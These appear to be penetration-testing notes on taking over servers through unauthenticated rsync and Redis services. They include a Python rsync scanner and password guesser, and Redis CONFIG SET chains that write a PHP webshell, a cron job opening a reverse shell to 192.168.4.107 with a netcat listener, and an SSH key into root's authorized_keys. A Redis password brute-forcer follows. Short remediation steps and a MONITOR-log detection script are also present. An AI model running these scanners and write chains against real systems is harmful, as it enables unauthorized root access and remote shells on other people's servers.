3.2.1 Rsync
3.2.2 Writing an rsync scanner in Python
3.3 Redis
Rsync
Introduction to Rsync
• Rsync (remote synchronize) is software that implements remote synchronisation; while synchronising files it preserves the original files' permissions, timestamps, hard and soft links and other metadata.
• rsync does not encrypt by default; an SSH tunnel can be used to synchronise over an encrypted channel.
Default port: 873
Configuration parameters
Misconfigured parameters
Case study
How I compromised the ChinaZ download site server
http://www.anquan.us/static/bugs/wooyun-2013-026232.html
Vulnerability scanning and discovery
nmap -n --open -p 873 X.X.X.X/24
<?php phpinfo(); ?>
rsync test.php 192.168.5.133::bak/hacker.php
Remediation
Restrict the IPs allowed to access the service
Do not allow anonymous access
Guard against weak passwords
Do not run the daemon with root privileges
Writing an rsync scanner in Python
Writing a batch scanner in Python
Requirements
Scan for hosts with port 873 open
Retrieve the rsync module listing
Password attempts
Code
import os
import datetime
import threading
from socket import *


def save_file(result):
    # Append one line to a date-stamped file of hosts found with port 873 open
    create_file_name = datetime.datetime.now().strftime('%Y-%m-%d')
    new_file = '{}_open.txt'.format(create_file_name)
    with open(new_file, 'a+') as fd:
        fd.writelines(result + '\n')


def socket_request(tarip, tarport):
    # Generator: yields a status string if a TCP connection to tarip:tarport succeeds
    try:
        timeout = 2
        setdefaulttimeout(timeout)
        s = socket(AF_INET, SOCK_STREAM)
        address = (str(tarip), int(tarport))
        s.connect(address)
        s.close()
        info = '{}:{} Open'.format(tarip, tarport)
        print('\033[6;30;42m' + info + '\033[0m')
        save_file(tarip)
        yield info
    except Exception:
        print('\033[0;31m' + '{}:{} {}'.format(tarip, tarport, 'Close') + '\033[0m')


def port_open_scan():
    # Read targets from ip.txt (one per line) and probe port 873 on each
    with open('ip.txt', 'r') as read_ip:
        tarport = 873
        for ip in read_ip:
            target_ip = ip.strip()
            # socket_request is a generator, so it must be iterated to run
            for x in socket_request(target_ip, tarport):
                pass


def rsync_pass_check(ip):
    # List the modules exported by the rsync daemon, then try the users in
    # userlist against each module with the password in pass.txt
    ip = ip.strip()
    command = "rsync " + ip + "::"
    print("Checking {}".format(ip))
    dirlist = []
    for line in os.popen(command):
        x = line.find("\t")      # module listing is "name<TAB>comment"
        y = line[0:x]
        dirlist.append(y)
    for dir in dirlist:
        userlist = ["www", "root", "test"]
        for user in userlist:
            crack_command = "rsync " + user + "@" + ip + "::" + dir + " --password-file=pass.txt"
            try:
                if os.popen(crack_command).read():
                    res_str = "[+] Vul Found: " + crack_command
                    with open("Vuln_IP.txt", "a+") as f:
                        f.write(res_str + "\n")
            except Exception as e:
                print(e)


def main():
    port_open_scan()
    open_port = '{}_open.txt'.format(datetime.datetime.now().strftime('%Y-%m-%d'))
    with open(open_port, 'r') as f:
        iplist = f.readlines()
    for ip in iplist:
        rsync_pass_check(ip)


if __name__ == '__main__':
    t = threading.Thread(target=main)
    t.start()
Redis
Redis security incidents
Redis is an open-source, network-capable, in-memory key-value store written in ANSI C.
Since the disclosure of the method that gains Linux root privileges through unauthenticated Redis access, its ease of use has led attackers to exploit the problem to break into Linux servers for cryptomining.
Security incidents
Unauthorized Redis access on a 鳳凰網 (ifeng.com) site leading to Getshell
http://www.anquan.us/static/bugs/wooyun-2015-0161323.html
Default Redis installation
wget https://codeload.github.com/antirez/redis/tar.gz/2.8.21
make
make install
cp -p redis.conf /etc/
redis-server /etc/redis.conf
Getting a shell via unauthorized access
Getting a WebShell
Precondition: the web root path is known
config set dir /var/www/html/
config set dbfilename shell.php
set x "<?php phpinfo();?>"
save
Writing a crontab task
set x "\n* * * * * bash -i >& /dev/tcp/192.168.4.107/6666 0>&1\n"
config set dir /var/spool/cron/
config set dbfilename root
Save
Attacker: nc -lvnp 6666
Writing an SSH public key
ssh-keygen -t rsa
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt
cat foo.txt | redis-cli -h 192.168.4.1 -x set crack
config set dir /root/.ssh/
config get dir
config set dbfilename "authorized_keys"
Save
ssh -i id_rsa root@192.168.4.1
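Detection logic for the three write chains above, as an added example that is not part of the original notes: it parses Redis MONITOR output and flags any client that points dir/dbfilename at a sensitive path and then issues SAVE. The MONITOR lines and the list of sensitive directories are constructed for this example.

```python
import re
import shlex

# Constructed sample of Redis MONITOR output reproducing the sequence the notes
# describe: one client retargets dir/dbfilename and then issues SAVE.
SAMPLE_MONITOR = """\
1700000000.100000 [0 192.168.4.107:50122] "INFO"
1700000000.200000 [0 192.168.4.107:50122] "CONFIG" "SET" "dir" "/root/.ssh/"
1700000000.300000 [0 192.168.4.107:50122] "CONFIG" "SET" "dbfilename" "authorized_keys"
1700000000.400000 [0 192.168.4.107:50122] "SAVE"
1700000000.500000 [0 10.0.0.5:41000] "SET" "session:1" "abc"
1700000000.600000 [0 10.0.0.5:41000] "CONFIG" "SET" "dir" "/var/lib/redis"
1700000000.700000 [0 10.0.0.5:41000] "SAVE"
"""

LINE_RE = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>\S+)\] (?P<cmd>.*)$')

# Directories where an RDB dump becomes a web shell, a cron job or an SSH key (constructed list).
SENSITIVE_DIRS = ("/root/.ssh", "/home/", "/var/spool/cron", "/etc/cron", "/var/www", "/etc/")

def parse_line(line):
    """Split a MONITOR line into (timestamp, client, argv); None if it is not a MONITOR line."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    argv = shlex.split(m.group("cmd"))  # MONITOR double-quotes every argument
    return m.group("ts"), m.group("client"), argv

def detect_rdb_write_abuse(monitor_text):
    """Return (client, dir, dbfilename, save_ts) for each SAVE/BGSAVE into a sensitive dir."""
    state = {}   # client -> last CONFIG SET values for dir / dbfilename
    alerts = []
    for line in monitor_text.splitlines():
        parsed = parse_line(line)
        if not parsed:
            continue
        ts, client, argv = parsed
        cmd = argv[0].upper() if argv else ""
        if cmd == "CONFIG" and len(argv) >= 4 and argv[1].upper() == "SET":
            key = argv[2].lower()
            if key in ("dir", "dbfilename"):
                state.setdefault(client, {})[key] = argv[3]
        elif cmd in ("SAVE", "BGSAVE"):
            st = state.get(client, {})
            d = st.get("dir", "")
            if any(d.startswith(p) for p in SENSITIVE_DIRS):
                alerts.append((client, d, st.get("dbfilename"), ts))
    return alerts
```

The same check applies to a `dir` set to the web root or a cron spool; on a real instance, `CONFIG` should additionally be renamed or disabled so the chain cannot run at all.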
Brute-forcing Redis with Python
Code
from socket import *

ip = '192.168.4.106'
port = 6379
timeout = 2
setdefaulttimeout(timeout)

# Send INFO without authenticating: an instance without requirepass answers
# with its info block, a protected one replies with an authentication error
s = socket(AF_INET, SOCK_STREAM)
s.connect((ip, int(port)))
s.send(b"INFO\r\n")
result = s.recv(1024)
if b"redis_version" in result:
    print("未受權訪問")
elif b"Authentication" in result:
    # Try each line of pass.txt with AUTH on a fresh connection
    with open('pass.txt', 'r') as read_pass:
        for password in read_pass:
            password = password.strip()
            s = socket(AF_INET, SOCK_STREAM)
            s.connect((ip, int(port)))
            s.send("AUTH {}\r\n".format(password).encode('utf-8'))
            result = s.recv(1024)
            if b'+OK' in result:
                print("密碼: {}".format(password))
Remediation
1. Set a password
Add to redis.conf:
requirepass 123qwqwdg23
2. Do not expose Redis to the public internet
3. Start it under an unprivileged user
useradd -r redis
chown -R redis:redis /usr/local/redis/
su redis
redis-server /etc/redis.conf
4. Restrict permissions on .ssh and lock it down
su - redis
chmod 400 .ssh/authorized_keys
chattr +i .ssh/authorized_keys
chattr +i .ssh